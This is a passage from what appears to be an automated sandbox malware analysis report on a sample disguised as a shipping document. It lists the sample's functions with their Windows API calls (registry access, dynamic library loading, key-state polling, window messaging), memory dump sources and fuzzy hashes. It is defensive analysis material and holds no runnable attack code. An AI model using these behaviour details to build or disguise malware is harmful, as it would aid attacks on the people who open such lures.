                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                    • String ID: SysAnimate32
                    • API String ID: 4146253029-1011021900
                    • Opcode ID: 1d23a9cc71517bf059273e913b70c8f93990e47bdde86a1feb8b62dc752aae3b
                    • Instruction ID: 21875ee9cb17bb4885dcda343a3686c264b2429bc7a1a4a81459d07196177fb2
                    • Opcode Fuzzy Hash: 1d23a9cc71517bf059273e913b70c8f93990e47bdde86a1feb8b62dc752aae3b
                    • Instruction Fuzzy Hash: 72218071600205AFEF106EA4DC80EBF37A9FB48368F10A619FA6CB6190D7319C519760
                    Function 00E66E45 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                    Download Yara Rule
                    APIs
                    • GetStdHandle.KERNEL32(0000000C), ref: 00E66E65
                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E66E98
                    • GetStdHandle.KERNEL32(0000000C), ref: 00E66EAA
                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00E66EE4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CreateHandle$FilePipe
                    • String ID: nul
                    • API String ID: 4209266947-2873401336
                    • Opcode ID: 04492c4c63a5042081872f2b67edb62f8fdc481e55105e2605d2d9e5d2eba188
                    • Instruction ID: 0f823deeece41e1bef5f1f5677ccd9b4aa6cabd51533e9f223869e450bec8fc7
                    • Opcode Fuzzy Hash: 04492c4c63a5042081872f2b67edb62f8fdc481e55105e2605d2d9e5d2eba188
                    • Instruction Fuzzy Hash: A921A478650205AFDF209F29EC04A9A7BF4EF447A4F205A29FCA0F72D0DB719954CB50
                    Function 00E66F13 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                    Download Yara Rule
                    APIs
                    • GetStdHandle.KERNEL32(000000F6), ref: 00E66F32
                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E66F64
                    • GetStdHandle.KERNEL32(000000F6), ref: 00E66F75
                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00E66FAF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CreateHandle$FilePipe
                    • String ID: nul
                    • API String ID: 4209266947-2873401336
                    • Opcode ID: 8fd76c5825cab176f232b8576abf9c53fcba29d5d803aacdec0968ae7768f120
                    • Instruction ID: 5d98ab79fda80450cf634cf6291b1a1af3adbf6b1425fa381bca2fa856ca808c
                    • Opcode Fuzzy Hash: 8fd76c5825cab176f232b8576abf9c53fcba29d5d803aacdec0968ae7768f120
                    • Instruction Fuzzy Hash: 48219D71690305ABDB209F69BC04A9AB7E8AF453A4F201A59FCA0F72D0DB7098508B60
                    Function 00E6ACCA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 00E6ACDE
                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00E6AD32
                    • __swprintf.LIBCMT ref: 00E6AD4B
                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,00E8F910), ref: 00E6AD89
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ErrorMode$InformationVolume__swprintf
                    • String ID: %lu
                    • API String ID: 3164766367-685833217
                    • Opcode ID: 35b855a6bde8b3f63857d97f0c32526b53aeb00caa7ad98ffb7dd5b2a1062a05
                    • Instruction ID: bc83b3ef98046a6514016330b8760c22cea90b0f6e963cb9100df83ce555d08a
                    • Opcode Fuzzy Hash: 35b855a6bde8b3f63857d97f0c32526b53aeb00caa7ad98ffb7dd5b2a1062a05
                    • Instruction Fuzzy Hash: 67216034A00209AFCB10EFA5D985DEE7BF8EF89714B144069F509BB252DA31EA45CB61
                    Function 00E5A30F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E07D2C: _memmove.LIBCMT ref: 00E07D66
                      • Part of subcall function 00E5A15C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E5A179
                      • Part of subcall function 00E5A15C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E5A18C
                      • Part of subcall function 00E5A15C: GetCurrentThreadId.KERNEL32 ref: 00E5A193
                      • Part of subcall function 00E5A15C: AttachThreadInput.USER32(00000000), ref: 00E5A19A
                    • GetFocus.USER32 ref: 00E5A334
                      • Part of subcall function 00E5A1A5: GetParent.USER32(?), ref: 00E5A1B3
                    • GetClassNameW.USER32(?,?,00000100), ref: 00E5A37D
                    • EnumChildWindows.USER32(?,00E5A3F5), ref: 00E5A3A5
                    • __swprintf.LIBCMT ref: 00E5A3BF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                    • String ID: %s%d
                    • API String ID: 1941087503-1110647743
                    • Opcode ID: 0c246db2ed914737717dc492acb7d08bbcb1ff606c6d6b7c79c362f075891692
                    • Instruction ID: 9da00fa0cad24a79fb1ec11ee6da86fd51b6d60b1b58d04b8f0752558c612e45
                    • Opcode Fuzzy Hash: 0c246db2ed914737717dc492acb7d08bbcb1ff606c6d6b7c79c362f075891692
                    • Instruction Fuzzy Hash: C311DCB06002096BDF10BF60DC86FEE37B8AF59301F085575FE0CBA182DA74598A8B71
                    Function 00E7EC69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                    Download Yara Rule
                    APIs
                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00E7ED1B
                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00E7ED4B
                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00E7EE7E
                    • CloseHandle.KERNEL32(?), ref: 00E7EEFF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                    • String ID:
                    • API String ID: 2364364464-0
                    • Opcode ID: a4f9726902b1088550ea7e466cbc8a54e854b1c5bbc80878cf0744a35cb4b5f4
                    • Instruction ID: 3a55bc4c757eb024987d42043907a6591efd74582cae00d9ae9227b211948643
                    • Opcode Fuzzy Hash: a4f9726902b1088550ea7e466cbc8a54e854b1c5bbc80878cf0744a35cb4b5f4
                    • Instruction Fuzzy Hash: 05815E716007009FD724EF28DC86B6AB7E5EF88710F14985DF999EB3D2DA70AC418B91
                    Function 00E2558D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                    • String ID:
                    • API String ID: 1559183368-0
                    • Opcode ID: 17c9c7776e299596ed796557eca7f8bd29831e9b0e98da48d3161094909ff33f
                    • Instruction ID: ffd4668bc7e95bcd115424b4102164363b4d17208fa10ab49e521218526319b6
                    • Opcode Fuzzy Hash: 17c9c7776e299596ed796557eca7f8bd29831e9b0e98da48d3161094909ff33f
                    • Instruction Fuzzy Hash: 1A51EA32A00B25DBDB248F69EA8466E77B1EF40324F24972EF835B62D0D7709D508B40
                    Function 00E800C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E07F41: _memmove.LIBCMT ref: 00E07F82
                      • Part of subcall function 00E80EA5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E7FE38,?,?), ref: 00E80EBC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E80188
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E801C7
                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00E8020E
                    • RegCloseKey.ADVAPI32(?,?), ref: 00E8023A
                    • RegCloseKey.ADVAPI32(00000000), ref: 00E80247
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                    • String ID:
                    • API String ID: 3440857362-0
                    • Opcode ID: d8cbb13573bebb12b26e39c0d67d06c7b06499806f84f994b429b9a37276b8f9
                    • Instruction ID: 0f081a0f0054ef4cbb49e0deee96b639fd3f6e8bd6b35b3f5e204cf3cffa1444
                    • Opcode Fuzzy Hash: d8cbb13573bebb12b26e39c0d67d06c7b06499806f84f994b429b9a37276b8f9
                    • Instruction Fuzzy Hash: 70515D31208204AFD704EF94DC85E6EB7E8FF88314F44592DF599A72A2DB30E948CB52
                    Function 00E7D9DC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E09997: __itow.LIBCMT ref: 00E099C2
                      • Part of subcall function 00E09997: __swprintf.LIBCMT ref: 00E09A0C
                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00E7DA3B
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00E7DABE
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00E7DADA
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00E7DB1B
                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00E7DB35
                      • Part of subcall function 00E05B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E6793F,?,?,00000000), ref: 00E05B8C
                      • Part of subcall function 00E05B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E6793F,?,?,00000000,?,?), ref: 00E05BB0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                    • String ID:
                    • API String ID: 327935632-0
                    • Opcode ID: ec1cf303cc93b8beae4e1ab1d46fa552383ea104c16aebeecab1a81b413e1df6
                    • Instruction ID: 541ebde740fa19931e15f169648ae10ba7798e98d22b32b78dfb2292b0f5f2bd
                    • Opcode Fuzzy Hash: ec1cf303cc93b8beae4e1ab1d46fa552383ea104c16aebeecab1a81b413e1df6
                    • Instruction Fuzzy Hash: 60510435A042099FDB01EFA8C8849AEB7F4FF59314B15D069E819AB352DB30AD85CF91
                    Function 00E6E5FD Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                    Download Yara Rule
                    APIs
                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00E6E6AB
                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00E6E6D4
                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00E6E713
                      • Part of subcall function 00E09997: __itow.LIBCMT ref: 00E099C2
                      • Part of subcall function 00E09997: __swprintf.LIBCMT ref: 00E09A0C
                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00E6E738
                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00E6E740
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                    • String ID:
                    • API String ID: 1389676194-0
                    • Opcode ID: 975a16e88d739db8de929f61ebed4a7b2af8c5a4b4fc4481b35929362905aec1
                    • Instruction ID: a6ea5c31f811dc1c8fa70d11edc6e266810a952f62d8c1e2afb4459b77cd8bf5
                    • Opcode Fuzzy Hash: 975a16e88d739db8de929f61ebed4a7b2af8c5a4b4fc4481b35929362905aec1
                    • Instruction Fuzzy Hash: B9513A39A00215DFCF05EF64C981AAEBBF5EF48314B149099E849BB3A2CB31ED51CB50
                    Function 00E8A088 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 71a470a1337fdae17ab416282ad413e2636d4e98982db6aa887b29226c0b03fe
                    • Instruction ID: 642b716b7fe49b7e7b1e9e132c734f183234d0b9f6f90cf18c4111100bcef477
                    • Opcode Fuzzy Hash: 71a470a1337fdae17ab416282ad413e2636d4e98982db6aa887b29226c0b03fe
                    • Instruction Fuzzy Hash: C941D3B5902104AFE710EF28CC4DFA9BBA5EB09364F191276E81DB72E1C730AD41DB51
                    Function 00E02344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • GetCursorPos.USER32(?), ref: 00E02357
                    • ScreenToClient.USER32(00EC57B0,?), ref: 00E02374
                    • GetAsyncKeyState.USER32(00000001), ref: 00E02399
                    • GetAsyncKeyState.USER32(00000002), ref: 00E023A7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: AsyncState$ClientCursorScreen
                    • String ID:
                    • API String ID: 4210589936-0
                    • Opcode ID: b72847dbcf863d2404bfb6156d933097594a3c89b0035137024e9beb8f824c0f
                    • Instruction ID: f4ebc6d5a5442b3d86bd0b1ea24d329f0d50457ca9ed1075084ff80ba8c348f6
                    • Opcode Fuzzy Hash: b72847dbcf863d2404bfb6156d933097594a3c89b0035137024e9beb8f824c0f
                    • Instruction Fuzzy Hash: 7C41813590410AFFCF159F64C848AE9BBB4FB05324F20536AF928B22D1C734A994EB91
                    Function 00E56700 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                    Download Yara Rule
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E5673D
                    • TranslateAcceleratorW.USER32(?,?,?), ref: 00E56789
                    • TranslateMessage.USER32(?), ref: 00E567B2
                    • DispatchMessageW.USER32(?), ref: 00E567BC
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E567CB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                    • String ID:
                    • API String ID: 2108273632-0
                    • Opcode ID: 96ca6ba4e5ddf6c7e69dc93a769ca5164f593f4da05155f745e06e8d503313f5
                    • Instruction ID: 7a56ee107ac83897680ba0f65215dea600ab2b54dddd915d701215412b4c6acd
                    • Opcode Fuzzy Hash: 96ca6ba4e5ddf6c7e69dc93a769ca5164f593f4da05155f745e06e8d503313f5
                    • Instruction Fuzzy Hash: F931B4329006069FDB248BB1CC44FF67BF8AB09309F541976E825F71A1E725A88ED790
                    Function 00E58CE1 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetWindowRect.USER32(?,?), ref: 00E58CF2
                    • PostMessageW.USER32(?,00000201,00000001), ref: 00E58D9C
                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00E58DA4
                    • PostMessageW.USER32(?,00000202,00000000), ref: 00E58DB2
                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00E58DBA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessagePostSleep$RectWindow
                    • String ID:
                    • API String ID: 3382505437-0
                    • Opcode ID: bdb267b810a36f7746ca8b5d7ca3e11513fd2f7e015ed6a20097ad4fba71da03
                    • Instruction ID: a0573199b4f6bd6ce50e44c7387769e63773f1900cd1e34cec851550d3c1dad4
                    • Opcode Fuzzy Hash: bdb267b810a36f7746ca8b5d7ca3e11513fd2f7e015ed6a20097ad4fba71da03
                    • Instruction Fuzzy Hash: FE31CE71900219EFDF14CF68DA4CAAE3BB9EB14316F104629FD29FA1D0C7B09918DB91
                    Function 00E5B4AE Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                    Download Yara Rule
                    APIs
                    • IsWindowVisible.USER32(?), ref: 00E5B4C6
                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00E5B4E3
                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00E5B51B
                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00E5B541
                    • _wcsstr.LIBCMT ref: 00E5B54B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                    • String ID:
                    • API String ID: 3902887630-0
                    • Opcode ID: dbdce022ffaeecf14d174088a1fb3945741ab561db8aa9b9e5b876a8a4d0e786
                    • Instruction ID: aa4387b002bc1960934351d7df1956f562f00fdd6456b363c8cee215f8f0f015
                    • Opcode Fuzzy Hash: dbdce022ffaeecf14d174088a1fb3945741ab561db8aa9b9e5b876a8a4d0e786
                    • Instruction Fuzzy Hash: DB210A31604100BEEB255B39AC05E7B7B99DF49751F105139FC09FA1A1FB61CC4497A0
                    Function 00E8B17F Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                    • GetWindowLongW.USER32(?,000000F0), ref: 00E8B1C6
                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00E8B1EB
                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00E8B203
                    • GetSystemMetrics.USER32(00000004), ref: 00E8B22C
                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00E70FA5,00000000), ref: 00E8B24A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
